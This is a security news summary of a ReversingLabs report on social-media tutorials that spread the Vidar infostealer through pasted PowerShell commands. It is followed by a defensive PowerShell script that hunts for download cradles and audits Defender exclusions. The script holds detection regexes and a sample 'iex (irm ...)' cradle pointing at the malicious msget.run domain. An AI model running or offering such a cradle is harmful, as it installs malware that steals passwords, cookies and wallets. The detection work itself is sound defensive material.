Overview
- ReversingLabs, which published its analysis on Wednesday, June 10, confirmed a polished TikTok and Instagram tutorial that tells Windows users to open PowerShell and paste a one-line command (for example an `iex (irm ...)` cradle, Invoke-Expression wrapped around Invoke-RestMethod, pointing to msget.run) that downloads and runs a file identified as Vidar.
- A second campaign uses comment-baiting to trigger direct messages that route victims to survey-gated sites such as d4ug.site, but researchers could not pass the survey steps so the final payload from those links remains unverified.
- Vidar is sold as a malware-as-a-service on underground markets for about $300 and is designed to steal saved browser passwords, autofill data, cookies, cryptocurrency wallets, and authentication tokens.
- Attackers tune videos to game recommendation signals that reward saves and shares—one tracked clip logged roughly 109,000 views with thousands of saves—while platform reporting has failed to remove some accounts during the investigation.
- ReversingLabs urges defenders to audit who can install software, expand phishing training to include social feeds, and encourage reporting of suspicious posts because Vidar’s October 2025 stealth updates and common scripts that add Windows Defender exclusions make infections harder to detect.
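The two detection hooks the summary names, the pasted `iex (irm ...)` download cradle and installer scripts that add Windows Defender exclusions, can both be checked from the endpoint. The following PowerShell is an added example and is not code from the ReversingLabs report; it assumes a Windows host with PowerShell Script Block Logging (Event ID 4104) enabled and Microsoft Defender present, and it uses the two domains the report names only as hunt indicators. The sample script-block text at the end is constructed and is matched, never executed.

```powershell
# Added example (not from the ReversingLabs report): hunt PowerShell script-block
# logs for copy-paste download cradles and audit Defender exclusions.
# Assumptions: Windows, PowerShell 5.1+, Script Block Logging (Event 4104) enabled,
# Defender cmdlets (Get-MpPreference) available.

# Regexes for common one-line download-and-execute cradles (case-insensitive match).
$CradlePatterns = @(
    'iex\s*\(?\s*irm\b',                              # iex (irm ...) / iex irm ...
    'Invoke-Expression.*Invoke-RestMethod',
    'Invoke-Expression.*Invoke-WebRequest',
    'DownloadString\s*\(',                             # Net.WebClient cradle
    '(-EncodedCommand|\s-e(nc)?)\s+[A-Za-z0-9+/=]{20,}' # encoded command blobs
)
# Domains named in the report; used as indicators, nothing is fetched from them.
$KnownIndicators = @('msget.run', 'd4ug.site')

function Test-DownloadCradle {
    # Returns the list of pattern/indicator names that matched in one script block.
    param([Parameter(Mandatory)][string]$ScriptText)
    $hits = @()
    foreach ($p in $CradlePatterns) {
        if ($ScriptText -imatch $p) { $hits += "pattern:$p" }
    }
    foreach ($d in $KnownIndicators) {
        if ($ScriptText -imatch [regex]::Escape($d)) { $hits += "indicator:$d" }
    }
    return ,$hits
}

function Find-SuspiciousScriptBlocks {
    # Walks recent 4104 events; Properties[2] is the ScriptBlockText field
    # (assumption based on the documented event layout).
    param([int]$MaxEvents = 2000)
    $events = Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
    } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        $text = [string]$e.Properties[2].Value
        $hits = Test-DownloadCradle -ScriptText $text
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Time    = $e.TimeCreated
                Hits    = ($hits -join '; ')
                Snippet = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

function Get-DefenderExclusionReport {
    # Any populated exclusion list on a workstation that should have none is a finding;
    # disabled real-time monitoring is a stronger one.
    $pref = Get-MpPreference
    [pscustomobject]@{
        ExcludedPaths      = @($pref.ExclusionPath      | Where-Object { $_ })
        ExcludedExtensions = @($pref.ExclusionExtension | Where-Object { $_ })
        ExcludedProcesses  = @($pref.ExclusionProcess   | Where-Object { $_ })
        RealTimeDisabled   = [bool]$pref.DisableRealtimeMonitoring
    }
}

# Constructed sample (not a real log entry) showing what the matcher flags offline;
# the path is a placeholder, only the domain comes from the report.
$sample = 'iex (irm https://msget.run/EXAMPLE-PATH)'
Test-DownloadCradle -ScriptText $sample     # -> pattern:iex\s*\(?\s*irm\b, indicator:msget.run

# Live hunt and exclusion audit on an endpoint:
Find-SuspiciousScriptBlocks | Format-Table -AutoSize
Get-DefenderExclusionReport | Format-List
```

Run it from an elevated session so Get-WinEvent can read the operational log; a non-empty result from `Find-SuspiciousScriptBlocks` or an unexpected entry in the exclusion report is the trigger for a full triage of the host, since the report notes Vidar's later updates make the payload itself harder to spot than the cradle that delivered it.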